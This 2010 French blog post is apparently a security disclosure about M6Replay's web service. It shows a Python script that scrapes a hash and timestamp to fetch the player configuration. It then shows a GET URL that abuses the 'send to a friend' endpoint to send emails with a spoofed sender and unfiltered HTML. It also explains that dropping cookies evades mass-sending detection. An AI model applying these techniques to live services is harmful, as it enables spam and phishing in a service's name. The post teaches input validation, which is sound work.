04
mai
'10

M6 replay: l'usine à fakemails/spams (rayez la mention inutile)

Publié le 04 mai 2010

M6Replay est un service de "catch-up TV", c'est à dire de TV de rattrapage. Il est réservé aux internautes français, et diffuse en streaming les épisodes de séries ainsi que d'émissions culturelles hautement intellectuelles comme "Secret Story".

Il était une fois Flash ...

Je rêvassais tranquillement sur IRC lorsqu'un lien sur le chan général a attiré mon attention: une vidéo qui faisait le buzz, et qui n'était pas posté par IvanLeF0u ! Quelle chance =). Je clique donc joyeusement sur le lien, pour aboutir sur une page qui m'envoie balader pour cause de player flash pas à jour, patati patata. Fait pas bon être sous linux. Qu'à cela ne tienne, je jette donc un oeil au code source de la page, et plonge mes mains dans le cambouis des code-monkeys de chez M6.

... et du code tout moisi...

Et là paf, je me prend une claque de suite par ce bout de code:

var hash = '';
hash+='0';
hash+='f';
hash+='6';
hash+='1';
hash+='0';
hash+='b';
hash+='4';
hash+='1';
hash+='9';
hash+='6';
hash+='c';
hash+='c';
hash+='0';
hash+='8';
hash+='9';
hash+='0';
hash+='2';
hash+='4';
hash+='d';
hash+='b';
hash+='9';
hash+='2';
hash+='7';
hash+='e';
hash+='a';
hash+='4';
hash+='b';
hash+='5';
hash+='9';
hash+='b';
hash+='b';
hash+='b';
var flashvars = {};
var configuration_url = './get_configuration.php?time='+1272922030+'&hash='+hash;
flashvars.configlink = encodeURIComponent(configuration_url);
var params = {};
params.quality = "high";
params.bgcolor = "#000000";
params.allowfullscreen = "true";
params.allowscriptaccess = "always";
var attributes = {};
attributes.id = "M6ReplayApplication";
attributes.name = "M6ReplayApplication";
swfobject.embedSWF("http://l3.player.M6.fr/swf/M6ReplayApplication.swf?dt="+(new Date()).getTime(), "flashContent", "100%", "725", "10.0.32.18", "http://l3.player.M6.fr/swf/expressInstall.swf", flashvars, params, attributes);

De suite, ça fait de la peur. Surtout l'obfuscation, à croire que les gens qui ont pondu ce code n'ont jamais entendu parler des systèmes de packing JS ou encore des techniques d'obfuscation avancées. Mais là n'est pas la question. Ce qui fait mal aux yeux, c'est la requête réalisant la récupération de la configuration: elle requiert un hash et un timestamp, certainement pour éviter une automatisation. Mais peine perdue.

Codons un petit tool pour aller chercher cette configuration:

#!/usr/bin/python

# M6Replay configuration retrieval =)
# (c) 2010 - virtualabs.fr

import re
import md5
import urllib2,urllib
import sys

# on cree quelques regexp
phash = re.compile("hash\+='([a-f0-9])';")
ptimestamp = re.compile("\./get_configuration\.php\?time='\+([0-9]+)\+'&ha")

try:
    # on recupere la page
    print '[+] Fetching m6replay.fr ...'
    req = urllib2.Request('http://www.m6replay.fr/')
    resp = urllib2.urlopen(req).read()

    # identification du timestamp et du hash
    print '[+] Extracting timestamp & hash ...'
    timestamp = ptimestamp.search(resp).group(1)
    hash = ''.join(phash.findall(resp))
    print '[i] Timestamp:%s hash:%s'%(timestamp,hash)

    # on lit la page avec le timestamp et le bon hash
    print '[+] Retrieving configuration ...'
    req = urllib2.Request('http://www.m6replay.fr/get_configuration.php?time='+timestamp+'&hash='+hash)
    configuration = urllib2.urlopen(req).read()

    # et on stocke ca dans un fichier
    config = open('configuration_v3.xml','w')
    config.write(configuration)
    config.close()
except:
    print '[!] Erreur lors de la recuperation de la configuration ...'

Et zou, il ne reste plus qu'à l'exécuter et récupérer le contenu du fichier de configuration, qui se trouve être par un pur hasard un fichier XML !

<id type="int"/>
                            <idSeq type="int"/>
                            <url_sem type="string"/>
                            <emailTo type="string"/>
                            <emailFrom type="string"/>
                            <message type="string"/>
                            <typeMail type="string"/>
                    </param>
            </service>
    </services>
[...]
    </header>
</config>

Woot ! Un fichier de description de service et des paramètres pour le player ... Que demander de plus ? On est donc ici en présence d'un service web proposant plusieurs fonctionnalités, très certainement employé par le lecteur Flash pour interagir avec la base de données. Et si on analysait un peu certaines méthodes offertes ?

Que le web service soit, et le web service fume

Le web service propose une fonctionnalité d'envoi de vidéo à un ami, fonctionnalité résumée par cette description de service:

<id type="int"/>
            <idSeq type="int"/>
            <url_sem type="string"/>
            <emailTo type="string"/>
            <emailFrom type="string"/>
            <message type="string"/>
            <typeMail type="string"/>
    </param>
</service>

Et là, c'est le drame: on peut remarquer la présence de champs tels que emailTo ou encore emailFrom ainsi que message, certainement des champs utilisés lors de la génération des emails envoyés aux amis. Le champ emailFrom semble intéressant, car il pourrait offrir la possibilité de mettre en adresse source absolument ce que l'on veut.

De plus, ce service est accessible via la méthode HTTP GET, c'est-à-dire juste en passant les différents arguments via l'url dans un navigateur :). Ce qui donne de plus très envie de tester cela. Alors testons:

http://www.m6replay.fr/pages/envoyer-a-un-ami-video.php?id=1&idSeq=1&url_sem=pouet&emailTo=virtualabs@gmail.com&emailFrom=casimir@pedobears.com&message=Coucou les n'enfants !!!!&typeMail=html

On entre cette URL dans un navigateur, et hop, il nous indique que le message a bien été envoyé ! Vérifions rapidement notre messagerie ...

Il semblerait que nous ayons bien reçu un email provenant de casimir@pedobears.com, nous invitant à consulter une vidéo sur m6replay.fr.

Quelques bonus croustillants en prime

Les entêtes sont eux aussi assez particuliers, car dévoilant des informations concernant le service qui a émis le mail:

Received-SPF: pass (google.com: domain of apache@usine.clubic.com designates 193.22.143.46 as permitted sender) client-ip=193.22.143.46;
Authentication-Results: mx.google.com; spf=pass (google.com: domain of apache@usine.clubic.com designates 193.22.143.46 as permitted sender) smtp.mail=apache@usine.clubic.com
Received: from back3b.clubic.com (localhost.localdomain [127.0.0.1])
    by back3b.clubic.com (Postfix) with ESMTP id 74C97232C080
    for <virtualabs@gmail.com>; Tue,  4 May 2010 00:02:13 +0200 (CEST)
Received: from usine.clubic.com (usine.clubic.com [193.22.143.12])
    by back3b.clubic.com (Postfix) with ESMTP id 6AF77232C07E
    for <virtualabs@gmail.com>; Tue,  4 May 2010 00:02:13 +0200 (CEST)
Received: by usine.clubic.com (Postfix, from userid 74)
    id 6732A790C2; Tue,  4 May 2010 00:02:13 +0200 (CEST)
To: virtualabs@gmail.com
Subject: Partage de la vidéo : 0 CONCERT 80' : Saison  Episode
HTTP-Posting-Client: 195.88.194.40
HTTP-Posting-URI: backstage_video.m6web.fr:80/ws.php
MIME-Version: 1.0
Content-type: text/html; charset=UTF-8
From: "casimir@pedobears.com"<casimir@pedobears.com>
Reply-To: casimir@pedobears.com
Message-Id: <20100503220213.6732A790C2@usine.clubic.com>

Notez par exemple les entêtes HTTP-Posting-Client et HTTP-Posting-URI, qui ont des valeurs assez cocasses. Il est aussi amusant de voir que les emails sont émis à partir de usine.clubic.com, et qu'ils passent le filtre anti-spam de google. Bref, une vraie machine à spam si elle tombe entre de mauvaises mains.

De plus, il est aisé d'intégrer du code HTML dans les messages envoyés, le web service ne filtrant pas celui-ci:

Et pour terminer dans la série des bonus, la détection d'envoi massif se base uniquement sur l'adresse email de destination et la session (à l'aide du cookie). Si un utilisateur malveillant effectue un envoi sur plusieurs boîtes distinctes sans stocker de cookies, alors celui-ci est indétecté.

** Conclusion **

Le web service employé par le player de M6 replay est vraiment trop laxiste en termes de sécurité, et peut servir de plate-forme de spam ou même d'envoi de fakemail à très peu de frais. Certes, le sujet du mail ne peut pas être modifié, mais il en fait un message de choix, imaginez un peu: des offres de viagra sponsorisées par M6Replay, qui viennent de M6Replay, qui ont la même tête que les mails classiques de M6Replay ... Heureusement que M6Replay n'est pas une banque.

Néanmoins, plusieurs leçons sont à tirer de cet exemple: - la conception de web service ne se fait pas à la légère - la technologie Flash est cool, mais peut être contournée - tout service peut être abusé d'une quelconque manière - le filtrage des entrées utilisateur doit être systématique

A noter toutefois qu'ils ont corrigé le script de chargement de configuration, celui-ci faisant auparavant appel à une page download.php qui prenait en paramètre un nom de fichier via un argument file, ce qui sentait bon la LFI =).



Les contenus disponibles sur ce blog sont publiés sous licence Creative Commons BY-NC-SA.
Vous pouvez réutiliser tout ou partie de ces contenus à condition de citer l'auteur et l'origine, vous ne pouvez en faire une utilisation commerciale, et enfin vous devez partager tout travail ou œuvre dérivée sous les mêmes conditions — c'est-à-dire avec la même licence d'utilisation Creative Commons.